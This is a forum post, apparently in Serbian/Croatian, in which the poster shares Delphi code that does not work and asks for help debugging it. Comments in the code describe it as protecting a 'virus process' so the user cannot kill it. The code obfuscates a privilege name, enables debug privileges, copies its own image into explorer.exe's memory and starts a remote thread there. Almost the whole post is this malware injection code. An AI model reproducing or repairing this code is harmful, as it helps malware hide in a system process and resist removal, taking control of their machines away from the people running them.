function DefendProcess(p : pointer) : LongWord; stdcall;
begin
// Ovo je procedura koja treba da se zapise u memoriji explorer.exe-a
result := 0;
end;
// Get debug privileges
procedure GetDebugPrivs;
const
SE_DEBUG_NAME = 'Wa@afqcTvmrmhaca';
var
hToken : THandle;
tkp : TTokenPrivileges;
retval : DWORD;
begin
If OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) Then
Begin
LookupPrivilegeValue(nil, PAnsiChar(_xor(SE_DEBUG_NAME)), tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, tkp, 0, nil, retval);
End;
end;
procedure WriteImage(hProcess: THandle; Module: Pointer; SizeOfImage: DWORD);
var
pMem: Pointer;
NumBytes, dwOldProt, i: longword;
mbi: TMemoryBasicInformation;
ptr: Pointer;
begin
VirtualFreeEx(hProcess, Module, 0, MEM_RELEASE);
pMem := VirtualAllocEx(hProcess, Module, SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
VirtualQueryEx(hProcess, pMem, mbi ,sizeof(TMemoryBasicInformation));
While (mbi.Protect <> PAGE_NOACCESS) and (mbi.RegionSize <> 0) Do
Begin
If (mbi.Protect <> PAGE_GUARD) Then
Begin
i := 0;
While (i < mbi.RegionSize) Do
Begin
ptr := Pointer(LongWord(pMem) + i);
VirtualProtectEx(hProcess, ptr, $1000, PAGE_EXECUTE_READWRITE, dwOldProt);
WriteProcessMemory(hProcess, ptr, ptr, $1000, NumBytes);
i := i + $1000;
end;
end;
pMem := Pointer(LongWord(pMem) + mbi.RegionSize);
VirtualQueryEx(hProcess, pMem, mbi, sizeof(TMemoryBasicInformation));
end;
end;
// Protect virus process, so user cannot kill it
procedure ProtectProcess;
var
hProcess : Cardinal;
ProcessId : Integer;
Module : pointer;
SizeOfImage : LongWord;
begin
GetDebugPrivs;
GetWindowThreadProcessId(FindWindow('Progman', nil), @ProcessId);
hProcess := OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
Module := Pointer(GetModuleHandle(nil));
SizeOfImage := PImageOptionalHeader(Pointer(Integer(Module) +
PImageDosHeader(Module)._lfanew +
SizeOf(DWORD) +
SizeOf(TImageFileHeader))).SizeOfImage;
WriteImage(hProcess, Module, SizeOfImage);
CreateRemoteThread(hProcess, nil, 0, @DefendProcess, Module, 0, ThreadID);
CloseHandle(hProcess);
end;
Jos jednom, ovaj kod je skoro ISTI kao i onaj koji sam nasao na net-u, ali ovde prijavljuje gresku... (a kad iskompajliram onaj od net-a, ne)... Izmenio sam samo nacin nalazenja explorer.exe PID-a (ja preko FindWindow, a onaj kod sa net-a preko listanja svih procesa itd...)
Ima li neko neki predlog ?